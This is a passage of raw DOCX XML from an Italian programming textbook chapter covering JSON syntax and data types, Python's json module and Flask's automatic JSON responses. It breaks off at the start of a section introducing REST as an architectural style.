        <w:t xml:space="preserve">) è il formato di gran lunga più usato per scambiare dati nelle API web moderne. Nasce nel mondo JavaScript ma oggi è supportato nativamente da praticamente ogni linguaggio. È</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">testo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, leggibile dagli umani, ma strutturato in modo che un programma possa interpretarlo senza ambiguità.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="150" w:name="la-sintassi-in-5-minuti"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sintassi in 5 minuti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JSON conosce sei tipi di dato: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Tipo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Esempio JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Numero</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">42</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">3.14</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">-7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Stringa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">"ciao"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">"mario@esempio.it"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Booleano</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nulla</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Array (lista)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">[1, 2, 3]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">["a", "b"]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Oggetto (dizionario)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{"nome": "Mario", "età": 25}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le strutture si compongono:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente"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"mario"</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"mario@esempio.it"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"attivo"</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"ruoli"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cliente"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"beta-tester"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"data_cancellazione"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BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attenzione a tre dettagli sintattici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, fonte di mille errori nei principianti:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chiavi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">degli oggetti devono essere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">stringhe fra virgolette doppie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"nome"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, mai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nome</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">né</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'nome'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. (Python è più permissivo, JSON no.)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">No virgola dopo l’ultimo elemento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di un array o di un oggetto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[1, 2, 3]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✓,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[1, 2, 3,]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✗.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">virgolette doppie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, mai singole:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"ciao"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✓,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'ciao'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✗.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="150"/>
    <w:bookmarkStart w:id="151" w:name="python-e-json"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python e JSON</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python ha nella libreria standard il modulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che converte automaticamente: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Tipo Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">↔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tipo JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">dict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">↔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">↔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">array</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">str</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">↔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">int</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">↔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">true, false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">↔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le due funzioni che userai più spesso:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Da oggetto Python a stringa JSON</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"nome"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Mario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"età"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">testo_json </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> json.dumps(dati)         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># '{"nome": "Mario", "et\\u00e0": 25}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Da stringa JSON a oggetto Python</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">testo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'{"nome": "Mario", "età": 25}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> json.loads(testo)              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># {'nome': 'Mario', 'età': 25}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Flask lo fa automaticamente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quando in Flask restituisci un dizionario da una funzione (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">return {"messaggi": [...]}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), Flask chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">json.dumps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dietro le quinte e imposta automaticamente l’header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Non devi fare nulla a mano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="151"/>
    <w:bookmarkEnd w:id="152"/>
    <w:bookmarkStart w:id="154" w:name="X2c469261c9df7e7733b8705feecd37d608e345a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.4 Cos’è REST: uno stile architetturale, non un protocollo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">REST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sta per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Representational State Transfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È uno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">stile architetturale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">definito da Roy Fielding nella sua tesi di dottorato del 2000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stile architetturale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">≠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">protocollo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
